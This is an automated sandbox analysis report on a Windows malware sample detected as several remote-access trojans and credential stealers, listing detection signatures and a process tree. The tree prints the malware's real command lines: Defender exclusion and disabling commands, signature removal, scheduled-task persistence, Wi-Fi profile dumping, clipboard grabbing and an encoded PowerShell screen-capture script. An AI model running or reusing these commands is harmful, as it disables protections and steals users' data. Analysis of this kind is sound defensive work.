Edit tour

Windows Analysis Report
iqA8j9yGcd.exe

Overview

General Information

Sample name:	iqA8j9yGcd.exe renamed because original name is a hash value
Original sample name:	06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314.exe
Analysis ID:	1503002
MD5:	7ea99740a913fd01ab5b6d630a65f501
SHA1:	fe11a17c1a403d6df28508d576c76ece07cce88b
SHA256:	06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314
Tags:	exe
Infos:

Detection

HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Sigma detected: Stop multiple services

Suricata IDS alerts for network traffic

Yara detected Amnesia Stealer

Yara detected DCRat

Yara detected Discord Token Stealer

Yara detected Millenuim RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected zgRAT

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Encrypted powershell cmdline option found

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Binaries Write Suspicious Extensions

Stops critical windows services

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes or reads registry keys via WMI

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

iqA8j9yGcd.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\iqA8j9yGcd.exe" MD5: 7EA99740A913FD01AB5B6D630A65F501)

iqA8j9yGcd.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\iqA8j9yGcd.exe" MD5: 7EA99740A913FD01AB5B6D630A65F501)

cmd.exe (PID: 7388 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Build.exe (PID: 7440 cmdline: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym MD5: 6123E1B1546C5468EDD1C8AA70F14A12)

hacn.exe (PID: 7500 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: 2F20A53D05D89D72A94192A6B8098B77)

hacn.exe (PID: 7564 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: 2F20A53D05D89D72A94192A6B8098B77)

cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

s.exe (PID: 7636 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym MD5: F651062559F616AC562C15B565CBC13F)

svchost.exe (PID: 7696 cmdline: "C:\ProgramData\svchost.exe" MD5: 45C59202DCE8ED255B4DBD8BA74C630F)

wscript.exe (PID: 7744 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 4332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ChainComServermonitor.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

WmiPrvSE.exe (PID: 7788 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 3596 cmdline: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2684 cmdline: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2448 cmdline: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

csc.exe (PID: 7504 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 8316 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB2CE.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCD2DF9DC1BB554A3A91A2FCAEEB39352E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 8760 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 8776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 8928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBDBB.tmp" "c:\Windows\System32\CSC8CDC9FB2323C4007AF66CC17D2144E5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

main.exe (PID: 7716 cmdline: "C:\ProgramData\main.exe" MD5: 3D3C49DD5D13A242B436E0A065CD6837)

setup.exe (PID: 7804 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)

based.exe (PID: 7516 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 6FA985B82082F957E08C24749C36D88B)

based.exe (PID: 7556 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 6FA985B82082F957E08C24749C36D88B)

cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7884 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7892 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8156 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3856 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 5272 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5656 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7344 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7648 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7332 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7652 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7664 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 3116 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8252 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 8276 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 2128 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 8260 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 5968 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8388 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBl